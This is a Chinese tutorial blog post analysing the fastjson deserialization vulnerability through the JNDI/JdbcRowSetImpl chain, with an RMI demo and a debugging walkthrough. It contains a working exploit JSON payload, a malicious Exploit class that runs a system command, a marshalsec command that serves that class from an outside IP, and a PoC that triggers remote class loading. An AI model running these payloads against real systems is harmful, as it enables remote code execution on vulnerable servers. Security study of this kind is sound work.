从0开始fastjson漏洞分析https://www.cnblogs.com/piaomiaohongchen/p/14777856.html

  有了前文铺垫,可以说对fastjson内部机制和fastjson的反序列化处理已经了然于心

  大致流程如下,简单说下:当调用Parse的时候,会先搜索@type,然后通过JSONSCanner判断用户的json输入,判断开头是否是{和",然后获取我们的输入@type类,通过JSONSCannerSymbool去解析,获取我们@type的值,使用集合的方式存储这个恶意类(就是我们@type的值),对恶意类序列化,反序列化,通过反射调用类中所有方法(get/set)和类中的属性,把获取到的方法进行处理,对获取到的属性进行序列化和反序列化,并使用集合封装处理.判断是否是set开头的方法,如果是,把set**后面的字段序列化然后反序列化.比如我们的bytecodes,对我们的输入解码,那么我们的输入就是编码

  不鸡肋的利用链:JNDI && JdbcRowSetImpl利⽤链

  先学习jndi:

    jdni具体含义:  

JNDI 即Java Naming and Directory Interface(JAVA 命名和目录接口),那么Java 命名的目的就是为了记录一些不方便记录的内容,就像DNS 中的域名与IP 的关系,存在一一对应的关系。

JNDI 被定义为独立于任何特定的目录服务实现。因此,可以以通用方式访问各种目录。

  jndi一个实际场景就是spring boot下的数据库连接池子:

    

  通过远程调用,其底层原理就是使用的jndi.

  JNDI架构:

  

  其中在fastjson漏洞利用中,最常用的就是ldap和rmi了. 即使是一点都不懂漏洞原理的,相信在打fastjson漏洞的时候也会遇到这两个协议

  他们的具体含义是:  

轻型目录访问协议(LDAP )。

Java远程方法调用(RMI )注册表。

  我们以rmi为例,写一段demo:

  rmi的目的很简单:就是要使运行在不同的计算机中的对象之间的调用表现得像本地调用一样。

  远程接口定义:

    IRemoteTest.java

package com.test.fastjson.jndi;

import java.rmi.Remote;

import java.rmi.RemoteException;

//必须继承Remote类型,必须抛出异常

public interface IRemoteTest extends Remote {

    public String test() throws RemoteException;

}

  接口实现类:

    IRemoteTestImpl.java

package com.test.fastjson.jndi;

import java.rmi.RemoteException;

import java.rmi.server.UnicastRemoteObject;

//远程接口实现

public class IRemoteTestImpl extends UnicastRemoteObject implements IRemoteTest {

    protected IRemoteTestImpl() throws RemoteException {

        super();

    }

    @Override

    public String test() throws RemoteException {

        return Thread.currentThread().getStackTrace()

                [1].getMethodName()+"被远程调用了";

    }

}

    

  

  编写服务端绑定:

    Server.java

package com.test.fastjson.jndi;

import java.net.MalformedURLException;

import java.rmi.AlreadyBoundException;

import java.rmi.Naming;

import java.rmi.RemoteException;

import java.rmi.registry.LocateRegistry;

//服务端绑定

public class Server {

    IRemoteTest iRemoteTest;

    public void server() throws RemoteException, AlreadyBoundException, MalformedURLException {

        iRemoteTest = new IRemoteTestImpl();

        //远程对象注册表实例

        LocateRegistry.createRegistry(6666);

        //把远程对象注册到RMI注册服务器上

        Naming.bind("rmi://127.0.0.1:6666/test",iRemoteTest);

        System.out.println("server绑定成功");

    }

}

  编写客户端,调用远程对象:

  Client.java:

  

package com.test.fastjson.jndi;

import java.net.MalformedURLException;

import java.rmi.Naming;

import java.rmi.NotBoundException;

import java.rmi.RemoteException;

//客户端调用服务端声明的对象

public class Client {

    public IRemoteTest iRemoteTest;

    public void client() throws RemoteException, NotBoundException, MalformedURLException {

        //在RMI注册表中查找指定对象

        iRemoteTest = (IRemoteTest) Naming.lookup("rmi://127.0.0.1:6666/test");

        //调用远程对象方法

        System.out.println("client:");

        System.out.println(iRemoteTest.test());

    }

}

  编写测试类:

    

package com.test.fastjson.jndi;

import org.junit.Test;

import java.net.MalformedURLException;

import java.rmi.AlreadyBoundException;

import java.rmi.NotBoundException;

import java.rmi.RemoteException;

public class RMITest {

    @Test

    public void testServer() throws MalformedURLException, RemoteException, AlreadyBoundException {

        Server server = new Server();

        server.server();

        while(true);

    }

    @Test

    public void testClient() throws RemoteException, NotBoundException, MalformedURLException {

        Client client = new Client();

        client.client();

    }

}

  先调用服务端,然后客户端远程调用方法:

    

  启动客户端:

     

  

  了解了rmi后,我们来看下JNDI && JdbcRowSetImpl利⽤链

  exp如下:

    

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://vps_ip/Exploit", "autoCommit":true}

    其中看见使用rmi,看到Exploit,通过前面的rmi学习,可以知道Exploit就是我们远程对象Exploit,我们远程调用Exploit类对象:

  通过前面学习rmi,我们可以模拟服务端,但是很多时候很麻烦,这里借助前辈的工具:快速搭建恶意rmi/ldap服务端:

  marshalsec, RMI / LDAP 恶意服务器快速搭建⼯具,下载地址:https://github.com/mbechler/marshalsec

  写个恶意类:

   

 先生成恶意类字节码:

  javac Exploit生成class字节码

  Exploit.java->javac Exploit.java ->Exploit.class:

import javax.naming.Context;

import javax.naming.Name;

import javax.naming.spi.ObjectFactory;

import java.io.IOException;

import java.io.Serializable;

import java.util.Hashtable;

public class Exploit implements ObjectFactory, Serializable {

    public Exploit(){

        try{

            Runtime.getRuntime().exec("open /System/Applications/Calculator.app");

        }catch (IOException e){

            e.printStackTrace();

        }

    }

    public static void main(String[] args){

        Exploit exploit = new Exploit();

    }

    @Override

    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {

        return null;

    }

}

  快速搭建rmi/ldap服务器:

   

java -cp marshalsec-0.0.1-SNAPSHOT-all.jar  marshalsec.jndi.RMIRefServer http://119.45.227.86/#Exploit

 

  

  这样就会生成服务端的监听,等待接收客户端的调用:

    rmi默认端口1099,可以自定义设置端口:

  在末尾加端口即可:

  

  客户端调用服务端:

  Exploit:    

    

package com.test.fastjson.Exploit_chain2;

import com.alibaba.fastjson.JSON;

import com.alibaba.fastjson.parser.ParserConfig;

public class ExploitPoc {

    public static void main(String[] args) {

        String poc ="{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://119.45.227.86:123:7777/Exploit\",\"autoCommit\":true}";

        JSON.parse(poc);

    }

}

  即可实现命令执行,可能部分人无法复测成功,因为ldap/rmi受限于jdk版本限制:

    

ldap适用 JDK11.0.1/8u191/7u201/6u211之前,rmi适用JDK8u113/7u122/6u132之前

  前面开头我们简单的讲解了下fastjson反序列化的流程,现在我们静态调试分析下:

    首先反射进入JdbcRowSetImpl或者debug Parse函数:

    

  查看定义的属性:

    

   private Connection conn;

    private PreparedStatement ps;

    private ResultSet rs;

    private RowSetMetaDataImpl rowsMD;

    private ResultSetMetaData resMD;

    private Vector<Integer> iMatchColumns;

    private Vector<String> strMatchColumns;

    protected transient JdbcRowSetResourceBundle resBundle;

  

  查看set和get方法:  

    

  有对应的get和set方法,所以不需要Feature.SupportNonPublicField

  根据exp看看datasource属性:

  设置datasource:

  

    对datasource进行赋值:

    

  接着调用setAutoCommit:  

    

  一定要让conn为null,所以exp里面没设置conn,为null才能触发else条件,走else条件会调用connent方法和设置autocommit:

  跟进this.connect():

  当前对象方法,那么就在这个类里面:

    

  重点:

    

  databasesoucrename可以外部定义!

  通过lookup远程查找,调用恶意类,从而实现rce,就是这么简单          

从0开始fastjson漏洞分析2的更多相关文章

  1. 从0开始fastjson漏洞分析

    关于fastjson漏洞利用参考:https://www.cnblogs.com/piaomiaohongchen/p/10799466.html fastjson这个漏洞出来了很久,一直没时间分析, ...

  2. Beescms_v4.0 sql注入漏洞分析

    Beescms_v4.0 sql注入漏洞分析 一.漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入. 二.漏洞环境搭建 1.官方下载 ...

  3. PHPCMS V9.6.0 SQL注入漏洞分析

    0x01 此SQL注入漏洞与metinfo v6.2.0版本以下SQL盲注漏洞个人认为较为相似.且较为有趣,故在此分析并附上exp. 0x02 首先复现漏洞,环境为: PHP:5.4.45 + Apa ...

  4. Apache Roller 5.0.3 XXE漏洞分析

    下载5.0.2的版本来分析 5.0.2的war包地址 http://archive.apache.org/dist/roller/roller-5/v5.0.2/bin/roller-weblogge ...

  5. ECShop 2.x 3.0代码执行漏洞分析

    0×00 前言 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店.2.x版本跟3.0版本存在代码执行漏洞. 0×01 漏洞原理 ECShop 没有对 $GLOBAL[‘_SE ...

  6. 最新phpcms v9.6.0 sql注入漏洞分析

    昨天爆出来的,但其实在此之前就i记得在某群看见有大牛在群里装逼了.一直也没肯告诉.现在爆出来了.就来分析一下.官方现在也还没给出修复.该文不给出任何利用的EXP. 该文只做安全研究,不做任何恶意攻击! ...

  7. ThinkPHP 5.x远程命令执行漏洞分析与复现

    0x00 前言 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的 ...

  8. linux漏洞分析入门笔记-bypass_PIE

    ubuntu 16.04 IDA 7.0 docker 0x00:漏洞分析 1.ASLR的是操作系统的功能选项,作用于executable(ELF)装入内存运行时,因而只能随机化stack.heap. ...

  9. Apache Log4j 反序列化代码执行(CVE-2019-17571) 漏洞分析

    Apache Log4j 漏洞分析 仅用于研究漏洞原理,禁止用于非法用途,后果自负!!! CVE-2019-17571 漏洞描述 Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开 ...

随机推荐

  1. N皇后求解。万万没想到,只用一个一维数组就搞定了。还体现了回溯。

    一.啥是N皇后?先从四皇后入手 给定一个4x4的棋盘,要在棋盘上放置4个皇后.他们的位置有这样的要求,每一列,每一行,每一对角线都能有一个皇后. 你可能会对这个对角线有疑惑,其实就是每一个小正方形的对 ...

  2. 快速创建你的第一个Spring Boot项目

    1. 创建工程 打开idea,利用Spring Boot搭建一个web工程,切身体会一下Spring Boot所带来的魅力!看看SpringBoot是如何快速搭建一个web项目. New-->P ...

  3. 认清 React 的useState逻辑

    useState运行过程解析 function App() { const [n, setN] = useState(0); //使用 myUseState() return ( <div> ...

  4. 扩展中国剩余定理(EXCRT)学习笔记

    扩展中国剩余定理(EXCRT)学习笔记 用途 求解同余方程组 \(\begin{cases}x\equiv c_{1}\left( mod\ m_{1}\right) \\ x\equiv c_{2} ...

  5. MySQL提升笔记(3)日志文件详解

    在MySQL数据库和InnoDB存储引擎中,有很多种文件,如:参数文件.日志文件.socket文件.pid文件.MySQL表结构文件.存储引擎文件. 本节重点关注日志文件,MySQL的复制.事务等重要 ...

  6. 孙悟空的身外身法术使用了Java设计模式:原型模式

    目录 定义 意图 主要解决问题 何时使用 优缺点 结构 简单形式的原型模式 登记形式的原型模式 两种形式比较 浅克隆和深克隆 孙悟空的身外身法术 浅克隆实现 深克隆实现 定义 原型模式属于对象的创建型 ...

  7. Day02_13_Javadoc_生成帮助文档

    JavaDoc 命令:javadoc -encoding UTF-8 -charset UTF-8 Doc.java 执行该命令后,会在java目录生成index.html打开就可以看到生成的文档了 ...

  8. 终于可以像使用 Docker 一样丝滑地使用 Containerd 了

    有追求的工程师一般都是有技术洁癖的,云原生的世界更是如此,Kubernetes虽然制定了容器运行时接口(CRI)标准,但早期能用的容器运行时只有Docker,而Docker 又不适配这个标准,于是给 ...

  9. Jenkins 自动触发执行的配置

    1. 两种触发方式 2. jenkins 和 github 同步配置 ngrok 安装 webhook 配置 1. 两种触发条件 Jenkins 中建立的任务是可以设置自动触发,更进一步的实现自动化. ...

  10. 【SpringBoot】Springboot2.x整合Redis(一)

    备注: springboto整合redis依赖于spring-boot-starter-data-redis这个jar 一,项目环境和依赖 1.POM.xml配置 <parent> < ...